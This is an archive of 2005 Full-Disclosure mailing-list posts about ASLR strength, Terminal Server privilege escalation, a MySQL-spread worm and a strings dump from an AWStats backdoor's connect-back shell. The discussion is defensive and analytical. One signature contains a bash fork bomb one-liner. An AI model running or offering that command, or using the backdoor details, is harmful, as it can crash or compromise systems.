On Thu, 27 Jan 2005, Brad Spengler wrote: I guess anyone who thinks that taking a hardcoded exploit and running it 256 times would always result in a successful exploit is stupid. It would not always result in a successful exploitation; just as flipping the coin twice is not a guarantee of getting tails once. Other than that, the amount of randomization is indeed puny; but then, even 32-bit randomization is a good defense only in certain situations, and often, can be defeated with some time, aided by luck or a decent NOP-equivalent sled. -- - bash$ :(){ :|:};: -- Michal Zalewski * [http://lcamtuf.coredump.cx] Did you know that clones never use mirrors? --- 2005-01-27 20:31 -- http://lcamtuf.coredump.cx/photo/current/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [lists] [Full-Disclosure] Terminal Server vulnerabilities
It's also only possible when you've got NetBIOS/CIFS open to the Internet, Yes I know... That is why I said security thru obscurity With this argumentation, you could sell your firewalls. No I would not I would use an ids with properly tuned sigs for the terminal server abd then connect the terminal server via a proxy like vnc running something over freebsd or linux. I would never allow a windows terminal server to be directly be connected to the net... -aditya Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [lists] [Full-Disclosure] Terminal Server vulnerabilities
No I would not I would use an ids with properly tuned sigs for the terminal server abd then connect the terminal server via a proxy like vnc running something over freebsd or linux. I would never allow a windows terminal server to be directly be connected to the net... Spot the two obvious mistakes in this reply. I retreat from the discussion, should've held back my first comment. j. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Terminal Server vulnerabilities
Title: Re: [Full-Disclosure] Terminal Server vulnerabilities But I would point out something much more important : there are many more local exploits than remote (on Windows just like any other OS). Local exploits : about 1-2 a month * POSIX - OS/2 subsystem exploitation * Debugging subsystem exploitation (DebPloit) * 16-bit subsystem exploitation (NTVDM)* Shatter Attacks * Etc. Remote exploits : about once a year * RPC/DCOM (blaster) * LSASS (sasser) Basically, if you are logged in as an unpriviledged user on a Terminal Server, you can easily become SYSTEM. If this Terminal Server is also a Domain Controller, game over.You forgot one important factor - the use of IE and Outlook for the fastdirect-to-customer delivery of local exploits. Which *also* results ina Game Over Assuming that the IE/Outlook bugs are privilege escalation bugs. There seem to be relatively few of those - all of the recent ones have given you credentials of the local user, not localsystem (or even admin). ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: Full-Disclosure Digest, Vol 2, Issue 58
On Thu, 27 Jan 2005 11:51:08 -0500 (EST), [EMAIL PROTECTED] Message: 8 Date: Thu, 27 Jan 2005 00:18:21 -0500 From: Mike Bailey [EMAIL PROTECTED] Subject: [Full-Disclosure] spoolcll.exe - new worm being distributed via mysql vulnerability? To: full-disclosure@lists.netsys.com Message-ID: [EMAIL PROTECTED] Content-Type: text/plain; charset=US-ASCII Aloha, Earlier tonight, i was sitting here at home doing some normal browsing, and work and my firewall alerted me that a program called spoolcll.exe was attempting to open up a port which i cannot remember now. i tried killing it, but it just came back, over and over again each time spawning itselfs on a new port. Registry says the worm created a service called evmon, it cannot be paused or stopped, but it can be disabled. The only information about this worm on google is a discussion at the following url: http://forums.whirlpool.net.au/forum-replies.cfm?t=291921p=1 they are beginning to determinthat it is being distributed via a hole in mysql. Do any of you know anything about this? Thanks in advance. -- Love, Mike Bailey -- It's a sort of new worm looking for MySQL weak root passwords. You get more info at Sans: http://isc.sans.org/diary.php?isc=a508f4a185755af19ea8bd45444a570b Boot in Safe Mode and delete that file. Then reboot. Of course, change your admin pass and firewall tcp port 3306. -- Saludos/Regards Luisma - Chaos reigns within. Reflect, repent, and reboot. Order shall return. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] CarolinaCon 2005 announcement
Various chapters of NC-2600 (Raleigh, Wilmington, Charlotte, Asheville, etc) are proud to announce the coming of: CarolinaCon-2005 The event will be June 10th-12th in Raleigh, NC. If interested in attending and/or presenting, please see the following link for existing and emerging details: http://www.carolinacon.org The only currently active links are Location (where registration/ reservations can be made) and Speakers (kinda obvious). Peace, Vic ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: [ GLSA 200501-36 ] AWStats: Remote codeexecution
I don't have the time to investigate the cgi and dc binaries. The cgi at least tries to daemonize and opens a TCP listening socket. They also try to replace the index page on the vulnerable site. cgi 1495 1495 0 /dev/tty 149E 149E 0 socket 14AA 14AA 0 listen 14C0 14C0 0 PsychoPhobia Backdoor is starting... 254E 254E 0 init.c dc 09C0 09C0 0 Welcome to Data Cha0s Connect Back Shell 09E9 09E9 0 No More Damn Issue Commands 0A20 0A20 0 Data Cha0s Connect Back Backdoor 0A42 0A42 0 /bin/sh 0A4D 0A4D 0 XTERM=xterm 0A59 0A59 0 HISTFILE= 0A63 0A63 0 SAVEHIST= 0A6D 0A6D 0 Usage: %s [Host] port 0A86 0A86 0 [*] Dumping Arguments 0A9C 0A9C 0 [*] Resolving Host Name 0AB4 0AB4 0 [*] Connecting... 0AC6 0AC6 0 [*] Spawning Shell 0AD9 0AD9 0 [*] Detached 4321 4321 0 dc-connectback.c cheers, m.w ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html